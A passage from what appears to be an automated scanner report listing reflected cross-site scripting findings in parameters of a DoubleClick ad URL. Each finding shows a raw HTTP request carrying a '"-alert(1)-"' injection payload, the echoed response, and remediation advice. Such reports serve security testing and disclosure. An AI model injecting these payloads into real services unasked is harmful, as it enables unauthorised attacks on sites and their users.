Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
va
...[SNIP]...

3.17. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9b5"-alert(1)-"3964ead4cbb was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
00/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.2
...[SNIP]...

3.18. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95dde"-alert(1)-"27c33359beb was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
15177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/h
...[SNIP]...

3.19. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d6a"-alert(1)-"df904e7515b was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
om/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=tradition
...[SNIP]...

3.20. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45027"-alert(1)-"b3054c498ad was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
45620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011
...[SNIP]...

3.21. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf0c"-alert(1)-"48df8c28707 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "o
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5235"-alert(1)-"df6b9809de9 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Produc
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7a4"-alert(1)-"f31f2c6fd97 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/16a/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnm
...[SNIP]...

3.24. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14624"-alert(1)-"577924b55b4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0
...[SNIP]...

3.25. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2d31"-alert(1)-"628e648557c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4876

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/16a/%2a/o%3B236574810%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssport
...[SNIP]...

3.26. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf16f"-alert(1)-"7e369353b08 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

